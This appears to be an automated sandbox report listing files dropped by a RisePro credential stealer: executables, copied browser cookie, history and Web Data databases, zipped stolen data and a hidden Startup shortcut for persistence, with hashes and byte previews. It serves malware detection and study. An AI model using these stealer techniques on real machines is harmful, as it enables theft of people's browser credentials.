                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):3001856
                                                                                                                                                                                  Entropy (8bit):7.9902601078319515
                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                  SSDEEP:49152:fBAdrMlL5e9wo9gMj0rnjBzhDqRBsFhU186LnFrq/OdncDhIYaMFEFT:KtJwogMYDll+R6FhtYdEwnW+YaMFqT
                                                                                                                                                                                  MD5:A19B05B874E77B99515C397C5DE13F48
                                                                                                                                                                                  SHA1:6996028DDF12116E8BB0FBCD5FA693DE0E14B78A
                                                                                                                                                                                  SHA-256:C6DC8E17A1D4A1545A12027D8FB15A2C625CE3781CD2062976861CEBAAE37A9A
                                                                                                                                                                                  SHA-512:4E0B6AA347062911D76DD6C6D575FD82CFA7F2C8C0A308967E77DC1ABDA2C7E14DFD0942869BDDD59E800359490FD2FC1AF08FFCD466428347473E20136001A4
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......C.........L.....L.....L.....H.G...H.....H.....H...R.L.....L.....L...............E.....-........Rich..................PE..L...N@.e...............".....`......$............@......................................@... .. .... .. .......... `.......l..x....0..h....................`.......................................................................................................4..................@............p......."...8..............@............@...0.......Z..............@............0...p.......b..............@....................d...b..............@....rsrc....0...0...0..................@..@..........x..`...(..................@....data.....!..0....!.................@...................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidibBzuPduPgFBl\UdgmfEtw7ukqXx7vdO3L.exe

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1755136
                                                                                                                                                                                  Entropy (8bit):7.944061716574701
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:49152:4+5L+Qg75yHWPUqbVpWlBRd1jcOHmf0FqSoYR2DPoWq:4+dFHWPS/Rd1IY4hoV
                                                                                                                                                                                  MD5:FA2940984475E3DD89E37F15DBE8A88F
                                                                                                                                                                                  SHA1:C7CFA3A0F500441CE22EF72BBD9BE7988F07C4D3
                                                                                                                                                                                  SHA-256:04BA7F7A64595085447F1D659F91D98693E53333F323EC7826A0E0D03918B626
                                                                                                                                                                                  SHA-512:C30C965067519BF3B172362AA5DF510FE867CAFE14BED875049F984B18018801119BD334B4ED49ED63E93D11F2A4C8D2397024D41328471E842445497B43F49C
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....$e.........."...0..$............E.. ...`....@.. ........................F.....}H....`.................................m........`.............................................................................................................. . .@... ....... ..............@....rsrc........`.......2..............@....idata . ...........6..............@... ..*..........8..............@...odmizeae.....@+......:..............@...wjrksujl. ....E.....................@...................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidibBzuPduPgFBl\ZunTSaNJLBVfWeb Data

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):196608
                                                                                                                                                                                  Entropy (8bit):1.1239949490932863
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                                                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                                                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                                                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                                                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidibBzuPduPgFBl\o0qT3dWYBP7ZHistory

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):155648
                                                                                                                                                                                  Entropy (8bit):0.5407252242845243
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                  MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                  SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                  SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                  SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidibBzuPduPgFBl\oOPEmFmu_xsJCookies

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                  Entropy (8bit):0.8508558324143882
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                                                                                                                  MD5:933D6D14518371B212F36C3835794D75
                                                                                                                                                                                  SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                                                                                                                  SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                                                                                                                  SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidibBzuPduPgFBl\pSE1jchbiT9aHistory

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):155648
                                                                                                                                                                                  Entropy (8bit):0.5407252242845243
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                  MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                  SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                  SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                  SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidibBzuPduPgFBl\soOc6NhyUO7lFaV2eQJV.exe

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1882112
                                                                                                                                                                                  Entropy (8bit):7.949517224812261
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:49152:wLi2wNaeFSEYrdH8UesU02hUv21QLUmRa2obb:oHnDEYrPW0cUvCmz+b
                                                                                                                                                                                  MD5:2C4C8C25D448625A0184403CA56EDB2D
                                                                                                                                                                                  SHA1:61531D43B5ADE8F66FD2409DF1A20902EF1A781E
                                                                                                                                                                                  SHA-256:01024AF50DDAF78F4F6A96B4E537400D4572A47E60CCF542F9EE6771DCDBAC0F
                                                                                                                                                                                  SHA-512:CCF51E10D1AAE0F669B771669F67500E1B7EE712A5078B947D256B57E722244F11F01B018820C4B53D1069137F5F4859E3353D8BE601F4E80AC1ECF939F30368
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*R..n3.@n3.@n3.@5[.A`3.@5[.A.3.@.^.A|3.@.^.Az3.@.^.A.3.@5[.Az3.@5[.A}3.@n3.@.3.@.].Ao3.@.]u@o3.@.].Ao3.@Richn3.@........................PE..L......e.............................@J...........@..........................pJ.....6.....@.................................Vp..j....`........................J...............................J..................................................... . .P..........................@....rsrc........`......................@....idata .....p......................@... ..*.........................@...tfywulqz......0.....................@...prpgnkkw.....0J.....................@....taggant.0...@J.."..................@...................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidibBzuPduPgFBl\suOrwW4ZcUbjWeb Data

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):196608
                                                                                                                                                                                  Entropy (8bit):1.1239949490932863
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                                                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                                                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                                                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                                                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\heidibBzuPduPgFBl\sy4bhhGvZ9bFDDZTr89U.exe

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):917504
                                                                                                                                                                                  Entropy (8bit):6.5798614215687845
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12288:MqDEvFo+yo4DdbbMWu/jrQu4M9lBAlKhQcDGB3cuBNGE6iOrpfe4JdaDgaKTx:MqDEvCTbMWu7rQYlBQcBiT6rprG8aax
                                                                                                                                                                                  MD5:CBE3CA8AEB654F541B59B3F97C0C9492
                                                                                                                                                                                  SHA1:C775259EB2B550BA7A9C49A12138562D9753D450
                                                                                                                                                                                  SHA-256:11E7D4527918A37E28F345ACF4A6E6AE7665D7D204543232E9400F92C58CB367
                                                                                                                                                                                  SHA-512:C0987C12B294CF37FF40F45EFF08F32A3A7F806B6A3C968832C5A2A44AEAE92AF32F229A8C5D5B60C806C8B6FC9AB1C411EC45C18AFC4D4F4675ED73F4B8E186
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L......e.........."..........P......w.............@..........................`............@...@.......@.....................d...|....@...........................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc........@......................@..@.reloc...u.......v..................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\rage131MP.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):13
                                                                                                                                                                                  Entropy (8bit):2.5654483718208256
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:L3Be:LBe
                                                                                                                                                                                  MD5:765FB18596CFD4E5EF217F12988E89FD
                                                                                                                                                                                  SHA1:9B990CE578B82FF3B1AF9894505810C2EE89E4E7
                                                                                                                                                                                  SHA-256:F39AF5B21139730740B0B11688D0C79E37FB24674C99F129D907D27325CE4608
                                                                                                                                                                                  SHA-512:CE9F13E5730AD59AB6D18919F4164421013A1F1D3C4C6CE4EA73E239CD53E48B7FC146485C5A32EC23B417983400A9722D0765A91514DAF69A4E77BA7E66252F
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:1708519397797

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\tYPDz_TYm0NTu0Y5ud8z_nO.zip

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):2765
                                                                                                                                                                                  Entropy (8bit):7.727314565331455
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:9uawXZV//QWGPvcVrXi5tV12YGCCsMZKCwsapcLrn3KJ6WkZOzc/Lw:qZV//Q1vcVO5tagDMNBear3KJy/s
                                                                                                                                                                                  MD5:F75071F8AEC67A41AAAA55F9FD82EE12
                                                                                                                                                                                  SHA1:265E5DD15F4A9C7679429EEA6477C0F6D0A1BA15
                                                                                                                                                                                  SHA-256:5D9472B19B24BA8C7B57D61F90C093B605BD3E746A14C629F3FD7A71C7680E8D
                                                                                                                                                                                  SHA-512:43DD8B6B321233C8C585A0B20EA5AB1DC44C95EF3FA1ED34152C594669FE372485EF573734C0080BF99816F01315F1386AFA478E43E2E72E866F2E8347FEFA0B
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                  • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: C:\Users\user\AppData\Local\Temp\tYPDz_TYm0NTu0Y5ud8z_nO.zip, Author: Joe Security
                                                                                                                                                                                  Preview:PK.........cUX................Cookies\..PK.........cUXA.`%............Cookies\Chrome_Default.txt....@.........i.&h.Cn..L...\.FA@.~..v7..O...%!es.f..../S..a...@.,ek.%.H......</<2..,...I..w......1q.f.F+PiM.=h.5..2....0....O..u_.~}Z.UM........y...Rj..4H..D...xLY@....[.d.c&......G_............j%q%....Y.|.....P...u..u..85/..Z`...-..c...^A8n...Y.3......j.G!....c.....AM@!._W.yQbs.@.....h.y.-......|J..i...r....c....M...E...GS...C....X..C.U..v.%......C,.L0,......5.=....6.....PK.........cUX..j'R...........information.txt.X.R.F.}w..a.....v...0..]..d!..46...d0...5..e.....g.r.t.H.4K.h.....VE...'..n.$.T.....)....a...b.;C....BE......2.q...4N.=.0!...&Xv;....F..>.'I...Q...$..X*9..P.....z..2....'....I.gD.ZHUB.8GQu.G....."Z@...p.itN.....Zu;7.x@'ia._.....*.K......n...(.S5=...%....8..]....x..(......T.....zB...i..N.<.O%`..@.#...%......rU..}.......P.:..h.".$-.Y..U..U.......E.%..hn......g.<.Q..4..i>.....\.i.U....D/....&..M.:,J>.5.v..vj.w...j2 5\....)*...Y.,5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\tmpaddon

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):491284
                                                                                                                                                                                  Entropy (8bit):7.997725234203649
                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                  SSDEEP:12288:u8fhrUPE5+8TK1g9M6y5JJtuiA50eHgB2rAnavTQu:fZrUPE5I1g9M6yyZ0AgYra4Z
                                                                                                                                                                                  MD5:09372174E83DBBF696EE732FD2E875BB
                                                                                                                                                                                  SHA1:BA360186BA650A769F9303F48B7200FB5EACCEE1
                                                                                                                                                                                  SHA-256:C32EFAC42FAF4B9878FB8917C5E71D89FF40DE580C4F52F62E11C6CFAB55167F
                                                                                                                                                                                  SHA-512:B667086ED49579592D435DF2B486FE30BA1B62DDD169F19E700CD079239747DD3E20058C285FA9C10A533E34F22B5198ED9B1F92AE560A3067F3E3FEACC724F1
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:PK...........V...,.}..........gmpopenh264.dll..|.U.8.I.....`....&l.Vpm.5Sf.N.(.."..YXY.%....V:;.......>....u.-...U....(.E.?*.ES.R..?...{'i...]}.}>._?Mr.....s.3s'....Ng.O0..m..?...z..4~{...w...H.\3{....U?*Y..K..+W.-K......,_i.g.k....NJLL.j0F..y..[?}1..........'.G^.#..^.C..{1.~..>.i..=............>}i.......h..h..t..O..^>w..PY.n.e.>...%Q.3....&H.d9....tqZ..pg3....G@u!.........[.4h....E.w.Y...~_1.^.#!f.+,.au......,._..:&...{N..1..~p..~?..DJ..T.".,.vR....u..P........8D;.,.BOp..........D..'...q*..l...;..6$.........9&.<.bU....dExynP..KK.........7~M.X....?.-Q..*.....zs......>..\...bv...y...s..+zN.Kr.(. .Ee.QRco.8..8.~..o..D.OT.5......O.gC.F.3..E......('..>......2Eu.5]l.t}.`...:j.....IW.u...J.....H.m.R.Tz.....O...*..Q...9..j.c.Uc...U8gD..q.^.3..|..Q.g[..Q6Q.q.....GBg..F[.\...D.C.?:1.}.../.t ..`.....}..........@...8c.G.....o. .......TyK.....sS.S..a.a..LR.0.k,.</;"...L.!WDp.M....8r..S..kq..o.0.m.-..,Z.[...>.G....P~.|.7TR...Ug.7.j......8Q>-.u..

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\up45CFBz_Ai1CiBRyRFsyfp.zip

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):2787
                                                                                                                                                                                  Entropy (8bit):7.731347265624247
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:9ZaMXZV//QWGPvcbptFv4jvf5zbPI7kn9tnwuWiXfA0mRrxRzlW6n3KJ65kVOE9G:XZV//Q1vcb3FIXN1vwqLmnJ3KJm
                                                                                                                                                                                  MD5:0D4F5825B2D914C1A07A36E41A70BCA7
                                                                                                                                                                                  SHA1:BB60A108BC941784B7CD5EBC0B984B8901F5C5BB
                                                                                                                                                                                  SHA-256:4509D43DAE35308285049438268F2C2949CB6402DE1DA916036DA36888252B21
                                                                                                                                                                                  SHA-512:B588AE2D88638F53B505CBB10C936123E0B4D8E508DC4B2819653ACE27BE72B86914C03776AD85FB99BEED537BD9C0CEA3FBEB4BC05C290092FEF9DE659B931F
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                  • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: C:\Users\user\AppData\Local\Temp\up45CFBz_Ai1CiBRyRFsyfp.zip, Author: Joe Security
                                                                                                                                                                                  Preview:PK.........cUX................Cookies\..PK.........cUXA.`%............Cookies\Chrome_Default.txt....@.........i.&h.Cn..L...\.FA@.~..v7..O...%!es.f..../S..a...@.,ek.%.H......</<2..,...I..w......1q.f.F+PiM.=h.5..2....0....O..u_.~}Z.UM........y...Rj..4H..D...xLY@....[.d.c&......G_............j%q%....Y.|.....P...u..u..85/..Z`...-..c...^A8n...Y.3......j.G!....c.....AM@!._W.yQbs.@.....h.y.-......|J..i...r....c....M...E...GS...C....X..C.U..v.%......C,.L0,......5.=....6.....PK.........cUX..1;h...........information.txt.X.r.H.}.....}.+.2wI<....MH(..$.>.i..ua%a.n.ok..2bR.W...>.3.U.D}...}..\.....#..n.4.T..........~...b.;#..g..|E..)...2.q...,.f=.0!3.EXv;.........'I...Q....yX*9.._.....M.Zp......Ny..(.s"x-.*.u...A.n\."H!..n4.8..F.?..Q..M^<....J..Ne.HC.w'...9...n...]..35JH&=V.o.}..b.....C....E....]M~G_..}.=......Y..K.....F.+..H.W.3...R......p..P.:..h.".$..I...U.'..#....(..s.-V.Bo.....'.4.".k ..l...=:......)..Q.....UM....uX....k......y....p....:(...Y..,s..

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS131.lnk

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Archive, ctime=Wed Feb 21 10:29:32 2024, mtime=Wed Feb 21 10:29:32 2024, atime=Wed Feb 21 10:29:26 2024, length=1882112, window=hide
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1193
                                                                                                                                                                                  Entropy (8bit):4.912610916137459
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:8FhmgD4+lXaoXyRBgKSKD8A0GajO9p4aBqygm:8vHDVlJCRsKfajwMyg
                                                                                                                                                                                  MD5:ECC5D2501ED98CEA48C66A0E25805295
                                                                                                                                                                                  SHA1:7399588706A17DC241D7090C9201F42F80E6E75A
                                                                                                                                                                                  SHA-256:2DEA535E1612FF12BDB6BA9D6019E348F4CF3699BCEF65CDB54D80CA9A99CC56
                                                                                                                                                                                  SHA-512:86BDB39DA60EA0413ECFFD71BFE8996DE0BBE48885AC150D9474DC9AD120310423B16B632B661CA29613B114AB1EE2D9C6B5B4BE113B6C6695309E0EE3C23578
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:L..................F.... .....a=.d..d.e=.d..[.,:.d.......................... .:..DG..Yr?.D..U..k0.&...&.......$..S...._.#.d.....4.d......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2UX.[...........................^.A.p.p.D.a.t.a...B.P.1.....UX.[..Local.<......EW<2UX.[....[.....................V]/.L.o.c.a.l.....N.1.....UX.[..Temp..:......EW<2UX.[....^.........................T.e.m.p.....\.1.....UX.[..EDGEMS~1..D......UX.[UX.[.....@........................E.d.g.e.M.S.1.3.1.....h.2.....UX.[ .EDGEMS~1.EXE..L......UX.[UX.[.....A.......................E.d.g.e.M.S.1.3.1...e.x.e.......k...............-.......j............N.^.....C:\Users\user\AppData\Local\Temp\EdgeMS131\EdgeMS131.exe....E.d.g.e.M.S.1.3.1.4.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.M.S.1.3.1.\.E.d.g.e.M.S.1.3.1...e.x.e.........|....I.J.H..K..:...`.......X.......571345...........hT..CrF.f4... ....w.....-...-$..hT..CrF.f4... ....w.....-...-$.............1SPS.XF.

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\ExperimentStoreData.json (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):4419
                                                                                                                                                                                  Entropy (8bit):4.929873368056398
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:gXiNFS+OcPUFEOdwNIOdwBjvYVbsL+z8P:gXiNFS+OcUGOdwiOdwBjkYL+z8P
                                                                                                                                                                                  MD5:285F12DDB6C391575D0B1C063304B4EF
                                                                                                                                                                                  SHA1:698AEABD59D43336047005BDC3AC7122B5FE3630
                                                                                                                                                                                  SHA-256:A9EF7E4F8E62409EE4C7CE93A4989596161ABDF1DE9667C5946155E910AC6B0D
                                                                                                                                                                                  SHA-512:0F182656B0BAF9EED589A805C530F62B099D968B0A8D8D6CA1541D8F441F097F6F265907A67503EBDBD1A7BB5A71F58AB4AFD7CBA17A6AD34DBE6F8C6C6C458C
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"bookmarks-toolbar-default-on":{"slug":"bookmarks-toolbar-default-on","branch":{"slug":"treatment-a","ratio":1,"feature":{"value":{},"enabled":false,"featureId":"this-is-included-for-desktop-pre-95-support"},"features":[{"value":{"enableBookmarksToolbar":"always"},"enabled":true,"featureId":"bookmarks"}]},"active":true,"enrollmentId":"d48f64a8-a4ab-4cdd-a650-4b386e41a201","experimentType":"nimbus","source":"rs-loader","userFacingName":"Bookmarks Toolbar Default On","userFacingDescription":"An experiment that turns the bookmarks toolbar on by default.","lastSeen":"2023-10-05T06:20:35.557Z","featureIds":["bookmarks"],"prefs":[{"name":"browser.toolbars.bookmarks.visibility","branch":"user","featureId":"bookmarks","variable":"enableBookmarksToolbar","originalValue":null}],"isRollout":false},"csv-import-release-rollout":{"slug":"csv-import-release-rollout","branch":{"slug":"enable-csv-import","ratio":1,"feature":{"value":{},"enabled":false,"featureId":"this-is-included-for-desktop-pre-95-s

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\ExperimentStoreData.json.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):4419
                                                                                                                                                                                  Entropy (8bit):4.929873368056398
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:gXiNFS+OcPUFEOdwNIOdwBjvYVbsL+z8P:gXiNFS+OcUGOdwiOdwBjkYL+z8P
                                                                                                                                                                                  MD5:285F12DDB6C391575D0B1C063304B4EF
                                                                                                                                                                                  SHA1:698AEABD59D43336047005BDC3AC7122B5FE3630
                                                                                                                                                                                  SHA-256:A9EF7E4F8E62409EE4C7CE93A4989596161ABDF1DE9667C5946155E910AC6B0D
                                                                                                                                                                                  SHA-512:0F182656B0BAF9EED589A805C530F62B099D968B0A8D8D6CA1541D8F441F097F6F265907A67503EBDBD1A7BB5A71F58AB4AFD7CBA17A6AD34DBE6F8C6C6C458C
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"bookmarks-toolbar-default-on":{"slug":"bookmarks-toolbar-default-on","branch":{"slug":"treatment-a","ratio":1,"feature":{"value":{},"enabled":false,"featureId":"this-is-included-for-desktop-pre-95-support"},"features":[{"value":{"enableBookmarksToolbar":"always"},"enabled":true,"featureId":"bookmarks"}]},"active":true,"enrollmentId":"d48f64a8-a4ab-4cdd-a650-4b386e41a201","experimentType":"nimbus","source":"rs-loader","userFacingName":"Bookmarks Toolbar Default On","userFacingDescription":"An experiment that turns the bookmarks toolbar on by default.","lastSeen":"2023-10-05T06:20:35.557Z","featureIds":["bookmarks"],"prefs":[{"name":"browser.toolbars.bookmarks.visibility","branch":"user","featureId":"bookmarks","variable":"enableBookmarksToolbar","originalValue":null}],"isRollout":false},"csv-import-release-rollout":{"slug":"csv-import-release-rollout","branch":{"slug":"enable-csv-import","ratio":1,"feature":{"value":{},"enabled":false,"featureId":"this-is-included-for-desktop-pre-95-s

